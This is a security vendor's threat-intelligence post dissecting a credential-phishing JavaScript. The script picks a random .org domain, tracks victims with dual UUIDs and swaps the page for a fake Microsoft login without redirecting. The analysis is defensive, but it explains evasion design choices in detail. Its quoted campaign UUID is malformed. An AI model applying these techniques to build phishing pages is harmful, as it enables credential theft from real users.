Unpacking the Phishing Script Behind a Server-Orchestrated Deception

October 22, 2025

By: Marie Mamaril, Intelligence Team

A cunning new phishing attack is bypassing Secure Email Gateways (SEGs) and evading perimeter defences. It uses a rare, sophisticated phishing script with random domain selection and dynamic server-driven page replacement, making it highly effective at stealing credentials and evading detection. Understanding this threat is essential to improving defenses.

Cofense Intelligence spotted this unusual tactic in early February 2025, and it is ongoing. The script, embedded in malicious web pages or email attachments, exemplifies advanced phishing tactics that prioritize speed, precision, and deception.

In the tactic, the script picks a random .org domain from a hardcoded, predefined list. The .org domains on the list appear to be dynamically generated in bulk without using words, likely in an attempt to bypass block lists or AI/ML tools designed to block domains based on certain word structures. The script then generates a dynamic UUID (Universal Unique Identifier), which can be used to track victims and serve as a campaign identifier, suggesting that this script may be part of a package that can be reused in different campaigns, potentially with different spoofed brands on credential phishing pages. The script then sends an HTTP(s) POST to the random server that enables the server to respond with a dynamically generated login form based on the victim’s context (e.g., targeting enterprise users with a personalized corporate login page).

While the POST request is not the final stop in the script’s execution, this serves as a pivotal step in the phishing attack, triggering further actions that manipulate the user’s browser session and potentially extend the attack.

This report analyzes the phishing script’s mechanics, highlighting its unique features—random domain selection, UUID generation, and dynamic page replacement— and the threat actors' customized approach to credential phishing page design.

Key Points

  • Unlike most phishing attacks that use components from multiple servers, this script picks one.org address at random, making automated analysis and blocking of the script source difficult.
  • The script’s use of hardcoded UUIDs unique to each campaign and dynamically generated UUIDs unique to each session mimics legitimate API identifiers; this dual UUID approach is unusual for its sophisticated, campaign-specific tracking. 
  • Most campaigns observed use HTML-based attachments and spoofed file-sharing sites (like Microsoft OneDrive/SharePoint Online, DocuSign, Adobe Acrobat Sign, etc.) to deliver the malicious URLs wherein the JavaScript is embedded.

The Bait: Phishing Campaign

The phishing indicators of compromise (IOCs) observed in this campaign are delivered via two primary vectors: 

  1. The phishing email contains HTML-based attachments that, when opened, contain an embedded URL that automatically leads to a credential phishing page. 
  2. Emails with embedded links that spoof cloud collaboration platforms like Microsoft OneDrive (or SharePoint Online), DocuSign, Google Docs, and Adobe Sign.


Unpacking-the-Phishing-Script-Behind-a-Server-Orchestrated-Deception_Figure1.PNG

Figure 1: Phishing email using Microsoft OneDrive/SharePoint Online to deliver the malicious URL

Anatomy of the JavaScript

The JavaScript snippet shown in Figure 3 takes on a different approach from traditional phishing scripts, which often rely on redundant domain retries and static redirects. Its three standout tactics—random domain selection without failover (e.g., no retry loop or error handling beyond console.log(xhr)) or redundancy, UUID generation, and dynamic page replacement— means changing a webpage’s content with attacker-controlled material, like a fake login page, without changing the web address. 

It’s significant because it deceives users and successfully evades security tools. This happens after a user interacts with a malicious webpage (e.g., clicking a link in a phishing email or inputting credentials). Instead of redirecting the user to a new website, the script swaps out the current page’s content with a fake login page designed to steal passwords or other sensitive information.

Unpacking-the-Phishing-Script-Behind-a-Server-Orchestrated-Deception_Figure2.PNG

Figure 2: A fake Microsoft credential phishing page rendered without a redirect.

Analyzing the script, we can see that it starts by loading jQuery from a legitimate source for hosting popular web libraries (cdnjs[.]cloudflare[.]com), a common web tool to manipulate the page quietly in the background. Then, it kicks off a series of functions checking if a string (such as an email encoded in Base64) is Base64-encoded.

Parameter

Function

isBase64():

Checks if a string is Base64-encoded (used to decode an email address if present).

checkIfEmail():

Validates if a string is an email address.

uuidv4():

Generates a random unique ID (e.g., for tracking individual victims)

 

If the string is indeed Base64-encoded, the page rewrites itself with whatever the server sends back, typically a login page tailored to phish for credentials with a company logo that corresponds to the domain name from the entered email address. 

Unpacking-the-Phishing-Script-Behind-a-Server-Orchestrated-Deception_Figure3.PNG

Random Domain Selection

After kicking off a series of functions such as loading jQuery, checking if a string is Base64-encoded, validating an email address, and generating a random ID, the he script's most intriguing step involves selecting a from a list of bizarre, seemingly random .org domains. This script selects a single domain from a list of nine .org domains (Math.random()) and sends a HTTPS POST request that contains a JSON payload to hxxps://[chosen-domain]/api/v3/auth, as seen in Figure 5, containing:

uuid: A hardcoded UUID used to track the campaign (6fafd0343-d771-4987-a760-25e5b31b44f for this campaign).

identifier: A dynamically generated UUID used to track the session (uniqueId via uuidv4()).

server: The randomly selected .org domain used to serve credential phishing content.

user: A plain text email address (from cfg, if valid).

What makes this tactic uncommon is that while most phishing scripts typically try multiple domains to ensure successful exfiltration, this script’s lack of failover means it relies only on one domain per execution (which might be riskier for the attacker). This either indicates the threat actor’s design preference for simplicity, or it is intended for a campaign suited for high-volume or broad-targeted attacks where some failures are acceptable. 

The code snippet illustrates this tactic:

Unpacking-the-Phishing-Script-Behind-a-Server-Orchestrated-Deception_Figure4.PNG'

Figure 4: JavaScript phishing script selecting a random .org domain for a POST request to mimic legitimate API traffic.

This approach of using random domains without failover logic reduces network traffic, making it harder for intrusion detection systems (IDS) to flag multiple failed requests. 

Additionally, the use of only .org domains is trusted and less likely to be blocked than easy-to-register and frequently abused TLDs like .dev or .xyz, enhancing the tactic’s effectiveness. It also suggests a deliberate choice to leverage its trusted reputation, possibly for a campaign targeting organizations.

As seen in our Q3 2024 Phishing Intelligence Trends Review, .org is not heavily exploited compared to .com due to its perceived legitimacy, aligning with this script’s design.

By minimizing requests, the attacker evades DNS monitoring and rate-limiting, critical in targeted spearphishing campaigns (MITRE T1566.002 - Phishing: Spearphishing Link). 

Usage of Dual UUID Generation

The script generates a universally unique identifier (UUID) using uuidv4() and includes a hardcoded UUID (6fafd0343-d771-4987-a760-25e5b31b44f) in the payload.

The hardcoded UUID (6fafd0343-d771-4987-a760-25e5b31b44f) likely serves as a campaign identifier or might be used as a specific target marker to a specific phishing campaign or victim group, while the dynamic UUID (uuidv4()) tracks individual victims, enabling the attacker to correlate exfiltrated data.

Unpacking-the-Phishing-Script-Behind-a-Server-Orchestrated-Deception_Figure5.PNG

Figure 5: Details sent to the server include a hardcoded UUID, an identifier unique to each credential phishing session, the randomized server where the harvested credentials are sent, and the email address entered into the phishing page.

Server-Driven Deception - Dynamic Page Replacement

The script’s most deceptive tactic is replacing the entire page with server-provided content, manipulating the browser session to deliver a credential phishing page. The server-driven nature of “resp.message” allows attackers to tailor content, enhancing deception.

The tactic supports a seamless user experience, critical for maintaining victim trust in the phishing page’s legitimacy. Unlike common phishing scripts that redirect (window.location.href), this tactic aligns with MITRE T1185 (Browser Session Hijacking), as it controls the user’s session to extend the attack. 

The code in Figure 6 demonstrates this.

Unpacking-the-Phishing-Script-Behind-a-Server-Orchestrated-Deception_Figure6.PNG

Figure 6: Part of the script that shows dynamically replacing a webpage with server-provided content, such as a fake login page, after a successful POST request.

 

Understanding the constantly evolving tactics and tools used in phishing attacks is critical to staying ahead of potential threats. Cofense Phishing Detection and Response platform provides comprehensive solutions designed to detect, analyze, and mitigate these threats effectively. To see how Cofense can help safeguard your organization against phishing attacks, schedule a demo today and take the first step toward a more secure future.